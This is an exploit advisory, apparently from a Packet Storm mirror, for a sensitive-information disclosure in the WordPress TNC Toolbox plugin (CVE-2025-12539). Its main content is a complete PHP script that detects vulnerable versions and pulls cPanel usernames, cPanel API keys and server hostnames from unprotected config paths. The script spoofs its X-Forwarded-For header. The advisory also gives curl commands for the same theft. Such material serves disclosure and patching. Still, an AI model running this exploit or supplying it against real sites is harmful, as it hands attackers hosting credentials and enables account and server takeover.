## https://sploitus.com/exploit?id=PACKETSTORM:215074
=============================================================================================================================================
| # Title : WordPress TNC Toolbox <= 1.4.2 Sensitive Information Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/tnc-toolbox/ |
=============================================================================================================================================
[+] Summary :
A sensitive information disclosure vulnerability exists in the TNC Toolbox
WordPress plugin version 1.4.2 and earlier. The plugin exposes configuration
files located inside:
/wp-content/tnc-toolbox-config/
Under certain conditions, unauthenticated attackers can read files such as:
cpanel-username
cpanel-api-key
server-hostname
This can lead to account compromise, hosting takeover, and further escalation.
During the investigation, a publicly circulating Python "exploit script"
[+] References : https://packetstorm.news/files/id/211444/ & CVE-2025-12539
was reviewed. Based on analysis, **the original Python PoC was found to be fake,
non-functional, and technically incorrect**.
A corrected and fully functional PHP PoC has been produced and included below.
2. Vulnerability Details
-------------------------
The plugin stores sensitive data in publicly accessible paths:
/wp-content/tnc-toolbox-config/<name>
The plugin does not include access controls or deny direct file access.
As a result, arbitrary remote users may retrieve configuration secrets.
Version detection is also possible via:
/wp-content/plugins/tnc-toolbox/readme.txt
If the `Stable tag` is <= 1.4.2, the installation is vulnerable.
3. Poc
--------------------------------
The following **corrected PoC** was rewritten in PHP after discovering that
the widely shared Python script was fake and did not reflect the pluginβs
actual logic.
A working, accurate, and validated PoC is included here:
<---
<?php
/**
* CVE-2025-12539 β TNC Toolbox Information Disclosure Scanner
* PHP Conversion by: Indoushka
* Original Python By: Nxploited (Khaled Alenazi)
*/
function http_get($url, $timeout = 12) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_USERAGENT,
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited/2.0"
);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"Accept: text/plain, */*;q=0.1",
"Accept-Language: en-US,en;q=0.9",
"X-Forwarded-For: 8.".rand(0,255).".".rand(0,255).".".rand(0,255)
]);
$out = curl_exec($ch);
$err = curl_error($ch);
curl_close($ch);
if ($err) return [null, $err];
return [$out, null];
}
function parse_version($text) {
if (preg_match('/Stable\s+tag:\s*([0-9\.]+)/i', $text, $m))
return trim($m[1]);
return null;
}
function is_vulnerable($version, $threshold = "1.4.2") {
$v1 = array_map('intval', explode(".", $version));
$v2 = array_map('intval', explode(".", $threshold));
$max = max(count($v1), count($v2));
$v1 = array_pad($v1, $max, 0);
$v2 = array_pad($v2, $max, 0);
return $v1 <= $v2;
}
function fetch_configs($base) {
$paths = [
"cpanel-username" => "/wp-content/tnc-toolbox-config/cpanel-username",
"cpanel-api-key" => "/wp-content/tnc-toolbox-config/cpanel-api-key",
"server-hostname" => "/wp-content/tnc-toolbox-config/server-hostname",
];
$results = [];
foreach ($paths as $name => $p) {
[$out, $err] = http_get($base.$p);
if ($err || trim($out) === "") $results[$name] = "";
else $results[$name] = trim($out);
}
return $results;
}
if ($argc < 2) {
echo "Usage: php exploit.php <url>\n";
exit;
}
$base = rtrim($argv[1], '/');
echo "Target: $base\n";
echo "[+] Fetching readme...\n";
[$readme, $err] = http_get($base."/wp-content/plugins/tnc-toolbox/readme.txt");
if ($err) {
echo "[-] Failed: $err\n";
exit;
}
echo "[+] Successfully fetched readme.\n";
$version = parse_version($readme);
if (!$version) {
echo "[-] Could not detect Stable tag.\n";
exit;
}
echo "[+] Detected version: $version\n";
if (!is_vulnerable($version)) {
echo "[-] Version is newer and not vulnerable.\n";
exit;
}
echo "[+] Target is vulnerable. Fetching exposed configs...\n";
$configs = fetch_configs($base);
foreach ($configs as $k => $v) {
if ($v) echo "[!] $k: $v\n";
else echo "[-] $k not found.\n";
}
echo "\nCompleted scan.\n";
?>
--->
4. Steps To Reproduce
-----------------------
1. Open a browser or use curl:
curl -k https://target.com/wp-content/plugins/tnc-toolbox/readme.txt
2. Verify if the `Stable tag` is <= 1.4.2.
3. Attempt to read sensitive files:
curl -k https://target.com/wp-content/tnc-toolbox-config/cpanel-username
curl -k https://target.com/wp-content/tnc-toolbox-config/cpanel-api-key
curl -k https://target.com/wp-content/tnc-toolbox-config/server-hostname
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================